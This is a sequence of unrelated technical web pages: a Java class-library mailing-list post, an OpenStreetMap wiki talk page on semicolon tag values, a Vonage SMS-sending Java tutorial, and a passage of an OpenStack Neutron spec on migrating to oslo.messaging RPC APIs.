Geir Magnusson Jr. wrote:
> 2) Core classes implemented by the VM for class-library usage
>    - standard - things that you expect in java.lang (java.lang.Object)
>    - non-standard - extensions to java.lang (java.lang.VMObject)
> 3) I was uncomfortable with extending java.lang. I understand the argument - that as they are package private, the language can be depended upon to keep them safe from user code using them, rather than some security infrastructure. However, isn't this a bit dangerous in terms of standard java.lang changes colliding?

In general, a VMInterface class resides as a package-private class in the package of the class it helps implement. Using package-private, non-user-visible classes seems to be a perfectly valid way to get similar things done in other, officially-certified-as-compatible implementations[1], so I don't think that having package-private classes means someone is extending the package's namespace, given that the VMInterface classes are not exported for user code to compile against. Therefore I think the term 'extension' is misplaced in this context. The VMInterface classes are an internal (and, in practice, very useful) detail of this particular class library implementation that does not extend the namespace available for user code to link against. Extending the namespaces would not be clever, for all the obvious binary compatibility reasons, after all.

The JCP may eventually specify classes in the future with the same names. That could happen, and would be just fine. The JCP is obviously free to call the specified classes any way they want, and if for some reason the JCP decides to call some future 1.6 Object class VMObject, so be it. :) The internal GNU Classpath VM interface for Object would have to change at that point, and things would move on, just as they do every time someone changes the VM interface for a different reason.

It currently changes rather frequently in some areas, as people figure out new ways to implement the respective classes in a better fashion.

cheers,
dalibor topic

[1] see the java.io.UnixFileSystem class in the stack trace.
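The pattern being described - a package-private helper class that a public class delegates to, without that helper becoming part of the public namespace - can be sketched in plain Java. This is an illustrative toy with invented names (VMCounter and Counter are not real Classpath classes); in Classpath itself the helper lives in the same package as the class it supports, e.g. java.lang for VMObject.

```java
// Toy sketch of the "VMInterface" pattern. VMCounter and Counter are
// invented names for illustration, not actual GNU Classpath classes.

// Package-private helper: code in other packages cannot compile or link
// against it, so it adds nothing to the namespace user code can see.
class VMCounter {
    // Stand-in for a VM-provided primitive operation.
    static long next(long previous) {
        return previous + 1;
    }
}

// The public class delegates an implementation detail to the helper.
public class Counter {
    private long value;

    public long increment() {
        value = VMCounter.next(value);
        return value;
    }
}
```

Because VMCounter has default (package) visibility, renaming or reshaping it later is purely an internal change, which is the binary-compatibility point the post is making.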
http://mail-archives.apache.org/mod_mbox/harmony-dev/200505.mbox/%3C42975B78.2080705@kaffe.org%3E
Talk:Semi-colon value separator

Discuss Semi-colon value separator here:

Contents
- 1 find my nearest cafe
- 2 why not multiple tags instead
- 3 multiple values for tags that are somehow connected to each other
- 4 Warning in Potlatch2
- 5 Escaping
- 6 Page focus changed from semi-neutral to the clear message Avoid semi-colon value separator
- 7 Jgpacker disruptive opinion based edits without arguments or talk at this page / tagging@ list
- 8 Avoid semi-colons?
- 9 Most of our data/mappers follow approach pick one value

find my nearest cafe

Why can "find my nearest cafe" not find something marked as amenity=cafe;bar? If that is the case, then the *semi-colon is NOT a value separator*, because it does not separate values into individual ones. --Jakubt 11:23, 2 July 2011 (BST)

why not multiple tags instead

What is the (technical) reason for not using a tag with the same key several times? Imagine using amenity=cafe amenity=bar instead of amenity=cafe;bar. It seems to solve the inability of the semicolon to act as a separator in searches, and also greatly simplifies usage for non-geeks. -- User:Jakubt 10:23, 2 July 2011
- +1 - why would such a simple, straightforward approach be unfeasible? --solitone 21:17, 20 November 2012 (UTC)
- Well, it's not unfeasible, apart from the fact that it would be a low-level change to the OpenStreetMap data representation, database and API, which would mean all data consumers and editors needing code changes to work with it. Changes like this can be made, but only rolled out as a new numbered version of the OSM API, e.g. "API 0.7" (not likely to happen any time soon). Should such a change be considered for "API 0.7"? Maybe.
It solves this particular niggling data problem, but it has consequences for people trying to understand OpenStreetMap (how to use the data, or how to add tags in an editor). It introduces a new thing mappers can do wrong in the editor (accidentally using the same key twice) and a new set of tag formulations for data consumers to contend with (though probably easier than contending with stuffed-in ';' chars). I wouldn't really describe this as a simple, straightforward change. -- Harry Wood 23:58, 20 November 2012 (UTC)
- How about numbering the tags and adding a 'tag:multi' tag with a value of how many values should be considered for this tag (e.g. amenity:multi=2, amenity1=cafe, amenity2=bar)? This way the renderer has a chance to render multiple tags next to each other. Especially useful for merged highways with multiple 'ref' values. And no API change necessary. --Mixmaxtw (talk) 06:37, 12 April 2013 (UTC)
- Yeah, so obviously you're now just suggesting another tagging scheme (fitting within the way the API/data format currently works). Did you mean to start a new heading for that idea? In the discussion below they're also suggesting bunging in numbers. -- Harry Wood (talk) 05:06, 13 April 2013 (UTC)

multiple values for tags that are somehow connected to each other

This does not fix the problem of having multiple values for tags that are somehow connected to each other. Imagine you want to tag the opening hours of a bank where the ATM has different opening hours than the bank itself. Or a road where different speed limits apply at different hours or for different vehicles. I would rather see a way to connect such tags, such as numbered namespaces, for example tagging the bank with amenity:0=bank, opening_hours:0=Mo-Fr 08-17:00, amenity:1=atm, opening_hours:1=Mo-Su 06:00-22:00. --Candid Dauth 00:41, 21 March 2009 (UTC)
- You gave me an idea for the multiple tags problem: use subscripts. For example, amenity[0]=bank, amenity[1]=atm, amenity[2]=... No subscript on a tag implies tag[0]. It's not as elegant as the multiple tags proposed above, but the idea might be useful somewhere. --Elyk 02:46, 21 March 2009 (UTC)
- This could solve currently unmappable limits that only apply to specified vehicles as well. For example, near my home there is a road that limits the weight to 3.5 tonnes, except for agricultural vehicles. With some "for" or similar tag, we could limit a limit to specified vehicles, in this example maxweight[0]=3.5; maxweight[1]=-1; for[1]=agricultural (presuming -1 means "no limit"). Another example: on the Autobahn 8, there is a segment where between 6 and 20 o'clock maxspeed is limited to 100 km/h, and 60 km/h for HGVs. Currently this is unmappable, but with "tag arrays" this would be easy: maxspeed[0]=100; hour_on[0]=6; hour_off[0]=20; maxspeed[1]=60; for[1]=hgv; hour_on[1]=6; hour_off[1]=20. As a consequence, we wouldn't have hundreds of different tag keys for the access of different vehicles but only the "access" and the "for" tag; for a cyclepath, for example: access[0]=no; for[0]=all; access[1]=yes; for[1]=foot; access[2]=designated; for[2]=bicycle. --Candid Dauth 02:03, 24 March 2009 (UTC)
- Not quite. What if there are some unrelated arrays on the same way? For example, suppose the road has name[0]=foo; name[1]=bar. Does this mean that road 'foo' has maxspeed=100, while road 'bar' has maxspeed=60? This doesn't make sense to a human, but a parser might get confused. Of course you could use different indices (e.g. name[2]=foo; name[3]=bar) but that gets ugly and abuses the whole array idea. --Elyk 05:14, 24 March 2009 (UTC)
- One problem is that all of the tags don't form any kind of hierarchy:

  node
  |-- amenity=bank
  |-- opening_hours=Mo-Fr 08-17:00
  |-- amenity=atm
  \-- opening_hours=Mo-Su 06:00-22:00

  Logically this should form a tree:

  node
  |-- amenity=bank
  |   \-- opening_hours=Mo-Fr 08-17:00
  \-- amenity=atm
      \-- opening_hours=Mo-Su 06:00-22:00

  (common part of node tags)
  name=Bank of ...
  (first subitem)
  1:amenity=bank
  1:opening_hours=Mo-Fr 08-17:00
  (second subitem)
  2:amenity=atm
  2:opening_hours=Mo-Su 06:00-22:00

  and

  name=... (default name)
  maxweight=3.5 (default maxweight)
  1:type=agricultural
  1:maxweight=5 (override default maxweight for 1:type=agricultural)
  2:type=non-agricultural
  2:maxweight=no (override default maxweight for 2:type=non-agricultural)

- Another problem is that some tag combinations don't easily form a tree. In the maxweight example above, which tag do you choose as the root?

  node
  |-- maxweight=3.5
  \-- maxweight=-1
      \-- for=agricultural

  or

  node
  |-- maxweight=3.5
  \-- for=agricultural
      \-- maxweight=-1

  You could argue either way. Maybe the maxweight=3.5 could be a child of another for=non-agricultural tag? --Elyk 05:49, 24 March 2009 (UTC)
- Your problem above with the two names of the road could perhaps be solved by double tagging:
  - name[0]=foo
  - maxspeed[0]=100
  - for[0]=motor_vehicle
  - name[1]=foo
  - maxspeed[1]=60
  - for[1]=hgv
  - name[2]=bar
  - maxspeed[2]=100
  - for[2]=motor_vehicle
  - name[3]=bar
  - maxspeed[3]=60
  - for[3]=hgv

  This looks a bit confusing, but I think it would actually be a solution without a tag hierarchy. (And I don't think such cases occur very often in reality.) We could also shorten this:
  - name[0,1]=foo
  - name[2,3]=bar
  - maxspeed[0,2]=100
  - maxspeed[1,3]=60
  - for[0,2]=motor_vehicle
  - for[1,3]=hgv

  (Which keeps the logic, but is even more confusing ;-)) --Candid Dauth 17:05, 24 March 2009 (UTC)
- Doesn't that already make relations a much more appealing solution for such complex cases? Alv 17:18, 24 March 2009 (UTC)
- How? By defining that members of a relation inherit its tags? --Candid Dauth 22:07, 26 March 2009 (UTC)
- If you represent the ATM as a separate node (an amenity=atm node separate from amenity=bank), then all of these awkward schemes for making one tag relate to another value are not necessary. (We're not designing a programming language here! Keep it simple!)
It creates its own problems of course, because now the ATM is not as clearly related to the bank, so I guess Alv is suggesting using a relation for that. Personally I just map them separately anyway (without a relation). If some automated process really needs to know that the ATM is related to the bank, it could use nearby-location heuristics, ...or we could stick relations on them. In any case, I would suggest that mapping them as separate elements is the solution for this particular ATM<->bank example. Are there any other examples where property tags need to associate themselves with different values within another multi-value tag? It seems to me that to worry about that kind of thing is to try to be too flexibly generic at the expense of mapping simplicity. -- Harry Wood 14:37, 5 December 2010 (UTC)

Warning in Potlatch2

Potlatch2 displays a warning "The tag contains more than one value - please check". It was about a path that is a ski piste in winter and a mountain bike route in summer, tagged as "route:mtb;ski". So what to do? --User:Gerdami 13:49, 29 January 2012 (UTC)
- I second that question. I have the same warning with multiple animals living in the same cage in the zoo (like "animal:donkey;lama"). Positron96 13:14, 27 June 2012 (BST)
- From what I understand, it's just a warning, not an error. So you should be able to use those multiple values. However, as I read on this wiki page, this practice is discouraged, and so Potlatch warns you. Following the reasoning in this wiki, you had better choose either mtb or ski, depending on the main usage your route has. --solitone 21:13, 20 November 2012 (UTC)
- Yeah, it's just a warning, but it's important to realise that little or no software dealing with mountain bike and ski routes will actually know how to decode your mashed-together tag. Yes, it's algorithmically possible, but you're making developers work very hard. Instead perhaps you should follow a 'split the element' approach. Map the ski route and the mountain bike route as two different ways. They could overlap each other, sharing nodes (which has its own problems), or in fact it wouldn't be all that unreasonable to have them following close to each other but not exactly the same way. I'm not an expert, but I think generally a mountain bike follows a more specific eroded zig-zagging pathway down the mountain, while a ski piste is probably easier just mapped as a centreline. Anyway, two different ways; problem solved. -- Harry Wood 23:47, 20 November 2012 (UTC)
- I face this very same issue, as bikers ride the hiking trails (route=hiking) in my area. I thought I might use route=hiking;mtb, but then I read Semi-colon value separator#When_NOT_to_use_a_semi-colon_value_separator and changed my mind. Plus, it's true that very few applications manage such a tagging scheme--for instance, Waymarked Trails: Hiking map does not. This explains why multiple values for route=* are almost unused at the moment [1]. Since both hikers and bikers follow the same trail, I wouldn't use two different ways to map one single trail, though. I feel a better practice would rather be using two relations--the first with route=hiking, and the second with route=mtb. The second relation could be created as a copy of the first (very practical from a mapping perspective), hence the two relations would share the same members, and the only difference between them would be in route=*. It's true you would end up with a duplicate relation; nevertheless you would still have one single way, which corresponds to reality, as you only have one physical trail. Any thoughts? --solitone 13:58, 21 November 2012 (UTC)
- Yes, there's no restriction on the number of relations you can attach to a particular element, even several of the same type (type=route). I'm usually quite anti-relations, because they get over-used in many silly ways.
Using relations is not the solution for all of these tagging problems (contrary to what some mappers seem to think!). For example, it would be rather a messy misuse to attach multiple relations onto animal cages. But in the case of overlapping hiking/biking routes, it's sensible, yes. It's already quite common to use relations for routes, and this is an established, reasonably elegant way of dealing with awkward overlaps. -- Harry Wood 15:18, 21 November 2012 (UTC)
- As for animals in a cage, maybe this is an example where semi-colon value separators make more sense, a bit like the car service types. You're capturing lots of extra hyper-detail which is (perhaps) less likely to be consumed in a way which would require distinct parsing and machine processing of the different animals. But yes, Potlatch will warn you. -- Harry Wood 23:47, 20 November 2012 (UTC)

Escaping

The page suggests doubling literal semicolons to escape them. That won't work, because:
- foo;;bar may mean either foo;bar or foo + (empty value) + bar
- foo;;;bar may mean either foo; + bar or foo + ;bar or foo + (empty value) + (empty value) + bar

While empty values are certainly always useless, a leading or trailing semicolon may sometimes be desired, e.g. when an inscription on a stone ends with a ";" because the rest of the text fell victim to weathering. The usual way to escape special characters is to use a dedicated escape character: \; → ; and \\ → \ --Fkv (talk) 19:13, 23 January 2015 (UTC)
- If empty values are ever allowed, then it doesn't work. Now at this point I would be tempted to say that you are disappearing up your own arse, overthinking a problem that basically doesn't exist... except I do like the point you're making here, because it actually means the overthinking that other people have done hasn't been thought through properly :-) Now that I think about it, if you come across a ';;' in the data, you're probably far more likely to be seeing a case where a user has entered an empty value into some buggy mobile app, rather than this escaping meaning. I've added a note that empty values should not be permitted. To me that seems like common sense, and actually that's a more useful rule to be stating. -- Harry Wood (talk) 13:49, 26 January 2015 (UTC)
- By the way, in my original incarnation of this page, the "When NOT to use" section was higher up the page, and all this escaping nonsense was placed further down as a sort of quirky footnote at the bottom. In my opinion that was a clearer way to arrange things. -- Harry Wood (talk) 13:52, 26 January 2015 (UTC)
- Leaving empty values aside, there's still the other problem that ;;; may mean literal ";" + separator, or separator + literal ";". This can be encoded, but not decoded. --Fkv (talk) 20:04, 26 January 2015 (UTC)
- Added this note to the page. Probably we should instead just state "it is impossible to decode multiple values using strings without an escape character and a null character", and not mess with the ;; suggestion. How many software developers have fallen into this trap? Xxzme (talk) 04:48, 27 January 2015 (UTC)
- No null character needed. I think that the backslash \ is a sufficient escape character, because it never occurs in normal text. --Fkv (talk) 06:37, 27 January 2015 (UTC)
- "\ is a sufficient escape character, because it never occurs in normal text". What? Do you have basic knowledge of encoding theory? You definitely have no idea how taginfo works: use the search box for \ in the value part, in the top-right corner [2]. Otherwise you wouldn't make such claims. Regarding my earlier point.
- The "When NOT to use" section is now higher up the page, and this escaping nonsense is lower down in a "syntax" section. -- Harry Wood (talk) 01:32, 31 May 2015 (UTC)

Page focus changed from semi-neutral to the clear message Avoid semi-colon value separator

This change was recently discussed at the tagging list; there is no better solution at the moment for regular mappers. Details are at the page and the tagging@ list. Xxzme (talk) 04:10, 27 January 2015 (UTC)
- This may be your perception, but as a matter of fact the majority of participants in the mailing list disagree with you and your page edits. Regular mappers really do not need to care about parsing. They only need to find the ";" key on their keyboards. --Fkv (talk) 06:31, 27 January 2015 (UTC)
- I don't care about the people at the tagging list. I do care about regular mappers. I don't care about keyboards; user interfaces are not limited to keyboard input. There are dozens of tagging schemes and thousands of mappers who use these tags to prove you wrong - 8735 distinct people have used the tag fuel:diesel=*. You can throw your tagging list in the garbage can. I have no idea what you are trying to achieve here. Do you have a better solution to the problem? Can you improve the database schema and relevant API code? Xxzme (talk) 06:45, 27 January 2015 (UTC)
- When you want to use taginfo, you simply go to the key page (such as ) and type the value in the search field inside the box. You will have as a result everything a regular mapper needs. I don't buy your argument about the other tags --> "People made this decision in the past in cases X and Y, so we have to follow it for everything, whether that's the best decision for other cases or not"? --Jgpacker (talk) 10:58, 27 January 2015 (UTC)
- You don't buy what? Is this how you make arguments? Wow. So what. I'm not your teacher. If you choose to be ignorant, then so be it. Don't fool other people into thinking it is a good idea to use semicolons.
- 10 points why it is wrong to use semicolons or multiple values in the value part of tags
- 3 alternatives showing users how to avoid them
- If you want to use semicolons, then you should prove every statement at this page wrong, not me. 11:10, 27 January 2015 (UTC)
- Here is how you should make statements. Your link to cuisine only proves my words: search for ; in taginfo. There are only 2212 cuisine values with ;. The top multi-valued tag in cuisine has only 642 instances. You only prove my words: most cuisine tags are single-valued or tagged using the single-node-per-tag approach. 9679 values in total; this means your approach is also less popular across all mappers around the world. This is not just my opinion of how things look; these are numbers. The top cuisine values are without semicolons; you don't need complex tools to examine the most popular values and sum the numbers. The numbers will always be against you. Always. It only proves my statement that most OSM data is single-valued, not multi-valued. There is no need for semicolons/multiple values when you have 3 different approaches to avoid them entirely. Xxzme (talk) 12:15, 27 January 2015 (UTC)

Jgpacker disruptive opinion based edits without arguments or talk at this page / tagging@ list

- [7][8] [9] [10] [11] [12] [13] [14]
- I have no idea what this person is trying to achieve, or whether he is trying to fool someone. There are plenty of links present to prove the statements at this page. If something is missing, then the missing parts should be added; not every single change should be reverted. Xxzme (talk) 10:36, 27 January 2015 (UTC)
- The discussion in the tagging list is still ongoing. You must not make such edits before reaching consensus. I was simply reverting them. The majority of people in the mailing list do not agree with your views. --Jgpacker (talk) 10:47, 27 January 2015 (UTC)
- Please settle the discussion before making extensive documentation changes, or else I'll ban both of you. --Dee Earley (talk) 10:50, 27 January 2015 (UTC)
- Hi, my changes were simply the reversion of documentation changes, exactly because the discussion is still ongoing (mostly in the tagging mailing list). --Jgpacker (talk) 11:00, 27 January 2015 (UTC)
- Then you will ban the wrong person. The discussion at the tagging list was 115 messages long. No activity since my last message to the list. My last message should look like this. It was posted on 2015-01-25; I hadn't seen a reply to it for 2 days, so I decided to make actual updates to the wiki. Jgpacker doesn't like the changes and wants to revert these edits without arguments. He did the same thing at the tagging list, and now he wants to repeat this trick here. Not going to happen. Xxzme (talk) 11:02, 27 January 2015 (UTC)
- You're both edit warring. I don't care who's "in the right" at the moment. I can revert back to the state this morning until there is some form of consensus on the change. --Dee Earley (talk) 11:08, 27 January 2015 (UTC)
- Quote: "Then you will ban the wrong person." My opinion: I don't think so. Quote: "No activity since my last message to the list." Maybe that's because you are simply being ignored? This has - I'm just guessing - maybe something to do with lines like "Are you an idiot?" in many of your mails. I support a revert to the state this morning, and I most definitely support a ban of Xxzme. --Imagic (talk) 11:30, 27 January 2015 (UTC)
- About the second quote: I suppose he was banned from the mailing list before sending his last message (for insulting a user even after receiving a warning). --Jgpacker (talk) 11:35, 27 January 2015 (UTC)
- Pages have been reverted to Decemberish, and the semicolon page has been renamed back and protected for a week. Please sort yourselves out and introduce gradual changes if deemed necessary, rather than wide sweeping changes to how the entire data set should be handled. Have a nice day. --Dee Earley (talk) 11:49, 27 January 2015 (UTC)

Sorry, my original words seem to have caused a heated debate. I would be interested in any consensus emerging on the mailing list, but really it requires calmer discussion. On the wiki here too. This discussion is confrontational. The nice thing about wiki discussions is that we can purge them onto an archive page. I suggest we do that with this discussion, so that we can take a breather and then continue more calmly with "Avoid semi-colons?" below. -- Harry Wood (talk) 17:11, 27 January 2015 (UTC)

Avoid semi-colons?

I wrote the original page here. There's some wording on there which is fairly strong - "In general avoid ';' separated values whenever possible" - but that's not an absolute "DO NOT USE". The page goes on to give an example of how to avoid them in some cases where a lot of mappers may be tempted to use them (the amenity=cafe;bar and amenity=library;cafe examples). But there are cases where they can be useful, and not too damaging to the simplicity of the data. So this is tricky. I wanted to use clear, strong words to try to stop mappers going overboard with using these characters. But the page is not intended as a ban on all semi-colons. To rename this whole page as "Avoid using semi colons" is not appropriate. Hopefully we can agree on this. I think it was just a misunderstanding. -- Harry Wood (talk) 17:11, 27 January 2015 (UTC)
- Well, a better solution would be two separate pages: a neutral page, "in general avoid separated values whenever possible". But I also need to point users to alternative schemes and disadvantages (the latter section may need some rework or more links); under no circumstances will I agree if this content becomes inaccessible simply because there is no consensus about it. How is this even possible in OSM? Is there a good idea for how to split the older version of the page into two pages? Xxzme (talk) 17:27, 27 January 2015 (UTC)
- The wiki page should reflect consensus.
That can be a difficult thing to achieve. You don't have to agree with the consensus, but you should make an effort to reflect it when you're making wiki edits. There's no single author in charge of the text. If you're suggesting that you could go off onto another wiki page where you can be the single author - well, I'm afraid that won't work. ALL wiki pages should reflect consensus. The only exception to that is if you make a subpage of your user page and label it clearly as an essay/opinion piece (we used to have a Template:Essay for this; not sure why it was deleted). In the main namespace, I don't think this is a big enough topic to spread onto multiple pages. We should document semi-colon value separators on this page... and yes... we should reflect consensus. This is actually a powerful thing about wikis. Some people love semi-colon values, some people hate them, and together they're forced to agree upon what the text of this wiki page should say. It's not always like that. Across a lot of pages of the wiki we can be quite bold and make some sweeping changes as long as they feel like improvements, but on pages like this we know that there is a weight of opinion on either side of a debate. It's not acceptable to do things like renaming the whole page to push one point of view. -- Harry Wood (talk) 13:05, 29 January 2015 (UTC)
- Concerning "You don't have to agree with the consensus": if someone disagrees, it's not a consensus by definition. With more than 500000 users, you will never reach a consensus. Therefore, the wiki cannot reflect a consensus. It should reflect usage and points of view supported by a notable portion of the community. I agree that single-user opinions as presented by Xxzme belong on the respective user page or a subpage thereof. Discussion pages and proposals are also fine, of course. --Fkv (talk) 13:44, 29 January 2015 (UTC)
- "If someone disagrees, it's not a consensus by definition". No, I think you're thinking of "unanimous agreement". Yeah, the contents of the wiki are not governed by unanimous agreement :-) -- Harry Wood (talk) 14:58, 29 January 2015 (UTC)
- Please don't start fighting over the correct term now! PLEASE!! ;-) --Imagic (talk) 15:42, 29 January 2015 (UTC)
- Hehe. Yeah, no, I thought it was fairly clear what "consensus" means, but this did give me pause for thought. Maybe, to be clear, I should say a longer thing... the wiki contents are governed by Consensus decision-making. And "views supported by a notable portion of the community" is maybe just another way of saying that. ...I think we know what we mean. -- Harry Wood (talk) 15:54, 29 January 2015 (UTC)

Most of our data/mappers follow approach pick one value

50M tags:
- tens of millions of highway tags. Just for laughs: the top value with a semicolon is highway=residential;unclassified, with 189 instances.

10M tags:
- the name tag and other name tags use single values, without semicolons
- most source tags are also single-valued
- same goes for addr:city tags
- same for postcodes
- surface, natural and landuse also follow the single key - single value pattern
- natural - only 70 values with ;, the top one with only 23 instances
- landuse - only 115 values with ;, the top one with 1359 but the second with only 58
- surface - 848 values (vs 4037 in total) with ;, the most popular with only 1222 instances.
Now compare this to the millions and hundreds of thousands of asphalt, unpaved, paved, gravel, ground, dirt, grass, concrete, paving_stones, sand, cobblestone and compacted.
- access tags are single-valued; more laughs: the top multi-valued value is access=agricultural;forestry with 217 instances

1M tags:
- shop tags are mapped using the single-node-per-tag approach to avoid tag collisions

If some person wants to use semicolons in values despite all these challenges, forcing other mappers into trouble while avoiding all the alternatives, that's only the fault of the person who fails to see the real reasons behind such a distribution of tags and the countless users' preference not to use multiple values in the value part and not to deal with all the relevant troubles. Xxzme (talk) 11:49, 27 January 2015 (UTC)
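For what it's worth, the backslash-escaping scheme proposed in the Escaping section above (\; for a literal semicolon, \\ for a literal backslash) does decode unambiguously, unlike the ;; doubling idea, because the escape character marks its meaning at the point where it occurs. A minimal sketch of such a decoder (illustrative only; the class and method names are my own, and this is not part of any OSM tool):

```java
import java.util.ArrayList;
import java.util.List;

// Sketch of a decoder for backslash-escaped, semicolon-separated values:
// an unescaped ';' separates values, "\;" is a literal semicolon, and
// "\\" is a literal backslash.
public class SemicolonValues {
    public static List<String> split(String raw) {
        List<String> values = new ArrayList<>();
        StringBuilder current = new StringBuilder();
        boolean escaped = false;
        for (char c : raw.toCharArray()) {
            if (escaped) {
                // Previous char was '\': take this char literally.
                current.append(c);
                escaped = false;
            } else if (c == '\\') {
                escaped = true;
            } else if (c == ';') {
                // Unescaped ';' terminates the current value.
                values.add(current.toString());
                current.setLength(0);
            } else {
                current.append(c);
            }
        }
        values.add(current.toString());
        return values;
    }
}
```

For example, the tag value cafe;bar decodes to two values, cafe and bar, while foo\;bar decodes to the single value foo;bar, so a trailing literal semicolon (the weathered-inscription case above) is representable without ambiguity.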
http://wiki.openstreetmap.org/wiki/Talk:Semi-colon_value_separator
We've built this example using JDK 16, Gradle 7.1 and the Vonage Server SDK for Java v6.4.0.

The Vonage SMS API is a service that allows you to send and receive SMS messages anywhere in the world. Vonage provides REST APIs, but it's much easier to use the Java SDK we've written for you. In this tutorial, we'll cover how to send SMS messages with Java! View the source code on GitHub.

Prerequisites

Hopefully, you already have a basic understanding of Java programming - we're not going to be doing any highly complicated programming, but it'll help you get up and running. As well as a basic understanding of Java, you'll also need the following installed on your development machine:
- Java Development Kit (JDK)
- Gradle (for building your project)

Using the Vonage Java SDK

First, you need to set up your Gradle project and download the Vonage Java SDK. Create a directory to contain your project. Inside this directory, run gradle init. If you haven't used Gradle before, don't worry - we're not going to do anything too complicated! Select 1: basic as the type of project to generate, 1: Groovy as the build script DSL, and name your project—or press Enter for the default option.

Next, open the build.gradle file and change the contents to the following:

// We're creating a Java Application:
plugins {
    id 'application'
    id 'java'
}

// Download dependencies from Maven Central:
repositories {
    mavenCentral()
}

// Install the Vonage Java SDK
dependencies {
    implementation 'com.vonage:client:6.4.0'
}

// We'll create this class to contain our code:
application {
    mainClass = 'getstarted.SendSMS'
}

Now, if you open your console in the directory that contains this build.gradle file, you can run:

gradle build

This command will download the Vonage Java SDK and store it for later. If you had any source code, it would also compile that—but you haven't written any yet. Let's fix that!
Because of the mainClass we set in the Gradle build file, you're going to need to create a class called SendSMS in the package getstarted. In production code, you'd want the package to be something like com.mycoolcompany.smstool, but this isn't production code. Gradle uses the same directory structure as Maven, so you need to create the following directory structure inside your project directory: src/main/java/getstarted. On macOS and Linux, you can create this path by running:

mkdir -p src/main/java/getstarted

Inside that directory, create a file called SendSMS.java. Open it in your favourite text editor, and we'll start with some boilerplate code:

package getstarted;

import com.vonage.client.VonageClient;
import com.vonage.client.sms.MessageStatus;
import com.vonage.client.sms.SmsSubmissionResponse;
import com.vonage.client.sms.messages.TextMessage;

public class SendSMS {

    public static void main(String[] args) throws Exception {
        // Our code will go here!
    }
}

All this does is import the necessary parts of the Vonage SDK and create a method to contain our code. It's worth running gradle run now, which should run your main method. It won't do anything yet, but this is where we get to the exciting bit.

Send SMS Messages With Java

Put the following in your main method:

VonageClient client = VonageClient.builder()
        .apiKey(VONAGE_API_KEY)
        .apiSecret(VONAGE_API_SECRET)
        .build();

Fill in VONAGE_API_KEY and VONAGE_API_SECRET with the values you copied from the Vonage API Dashboard. This code creates a VonageClient object that can be used to send SMS messages. Now that you have a configured client object, you can send an SMS message:

TextMessage message = new TextMessage(VONAGE_BRAND_NAME,
        TO_NUMBER,
        "A text message sent using the Vonage SMS API");

SmsSubmissionResponse response = client.getSmsClient().submitMessage(message);

if (response.getMessages().get(0).getStatus() == MessageStatus.OK) {
    System.out.println("Message sent successfully. " + response.getMessages());
} else {
    System.out.println("Message failed with error: " + response.getMessages().get(0).getErrorText());
}

Again, you'll want to replace VONAGE_BRAND_NAME and TO_NUMBER with strings containing the virtual number you bought and your own mobile phone number. Make sure to provide the TO_NUMBER in E.164 format—for example, 447401234567.
Once you've done that, save and run gradle run again. You should see something like this printed to the screen:

Message sent successfully.[com.vonage.client.sms.SmsSubmissionResponseMessage@f0f0675[to=447401234567,id=13000001CA6CCC59,status=OK,remainingBalance=27.16903818,messagePrice=0.03330000,network=23420,errorText=<null>,clientRef=<null>]]

... and you should receive a text message! If it didn't work, check whether something was printed after ERR: in the line above, and maybe wait a few more seconds for the message to appear.

Note: In some countries (US), VONAGE_BRAND_NAME has to be one of your Vonage virtual numbers. In other countries (UK), you're free to pick an alphanumeric string value—for example, your brand name like AcmeInc. Read about country-specific SMS features on the dev portal.

You've just learned how to send an SMS message with Vonage!
https://developer.vonage.com/blog/17/05/03/send-sms-messages-with-java-dr
CC-MAIN-2022-40
refinedweb
803
56.96
Dropping rpc API compat layer¶

This proposal is to make more direct use of oslo.messaging APIs throughout Neutron instead of a compatibility layer based on an old API.

Problem Description¶

Neutron has migrated from the rpc code in oslo-incubator to the oslo.messaging library. The oslo.messaging library has a different (but better) API. To ease the transition to oslo.messaging, Neutron has used some compatibility code to convert the older style API usage to oslo.messaging APIs. This proposal is to make more direct use of oslo.messaging APIs throughout Neutron. Moving toward more direct usage of oslo.messaging APIs will improve consistency with other projects, since all projects should be converging on the newer style APIs.

Proposed Change¶

The following classes are considered part of the compatibility layer. The direct use of each of these will be removed and replaced with direct use of the equivalent underlying oslo.messaging APIs:

- neutron.common.rpc.RpcProxy
- neutron.common.rpc.RpcCallback
- neutron.common.rpc.RPCException
- neutron.common.rpc.RemoteError
- neutron.common.rpc.MessagingTimeout

This looks like a small list, but it’s more invasive than it looks. It will be broken up into several iterative patches that are more easily reviewed and merged over time.
Here are some examples of the most invasive conversions (RpcProxy and RpcCallback):

from oslo import messaging

from neutron.common import rpc as n_rpc

Old style client interface using RpcProxy:

class ClientAPI(n_rpc.RpcProxy):

    BASE_RPC_API_VERSION = '1.0'

    def __init__(self, topic):
        super(ClientAPI, self).__init__(
            topic=topic, default_version=self.BASE_RPC_API_VERSION)

    def remote_method(self, context, arg1):
        return self.call(context,
                         self.make_msg('remote_method', arg1=arg1))

    def remote_method_2(self, context, arg1, arg2):
        return self.call(context,
                         self.make_msg('remote_method_2',
                                       arg1=arg1, arg2=arg2),
                         version='1.1')

New style client interface:

class ClientAPI(object):

    def __init__(self, topic):
        target = messaging.Target(topic=topic, version='1.0')
        self.client = n_rpc.get_client(target)

    def remote_method(self, context, arg1):
        cctxt = self.client.prepare()
        return cctxt.call(context, 'remote_method', arg1=arg1)

    def remote_method_2(self, context, arg1, arg2):
        cctxt = self.client.prepare(version='1.1')
        return cctxt.call(context, 'remote_method_2', arg1=arg1, arg2=arg2)

Old style server interface:

class ServerAPI(n_rpc.RpcCallback):

    RPC_API_VERSION = '1.1'

    def remote_method(self, context, arg1):
        return 'foo'

    def remote_method_2(self, context, arg1, arg2):
        return 'bar'

New style server interface:

class ServerAPI(object):

    target = messaging.Target(version='1.1')

    def remote_method(self, context, arg1):
        return 'foo'

    def remote_method_2(self, context, arg1, arg2):
        return 'bar'

Performance Impact¶

Negligible. In theory, this is removing a compatibility layer so there should be less code, but the overall performance impact of removing the layer is negligible in the broader scope of things.

Developer Impact¶

There are several impacts to developers. Developers used to the older rpc API (and the equivalent compatibility layers) will have to learn what’s different. Arguably, it’s conceptually quite similar, so this shouldn’t have a large impact.
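To make the new-style pattern above concrete, here is a minimal, self-contained Python sketch of the prepare()/call() flow. Note that FakeCallContext and FakeClient are stand-ins invented for illustration (they only record what would have been dispatched); they are not oslo.messaging APIs.

```python
class FakeCallContext:
    """Stands in for the call context that a real prepare() returns."""
    def __init__(self, version):
        self.version = version

    def call(self, context, method, **kwargs):
        # A real client would serialize this and dispatch it over the
        # message bus; here we just record what would have been sent.
        return {"method": method, "version": self.version, "args": kwargs}


class FakeClient:
    """Stands in for the client returned by n_rpc.get_client(target)."""
    def __init__(self, default_version="1.0"):
        self.default_version = default_version

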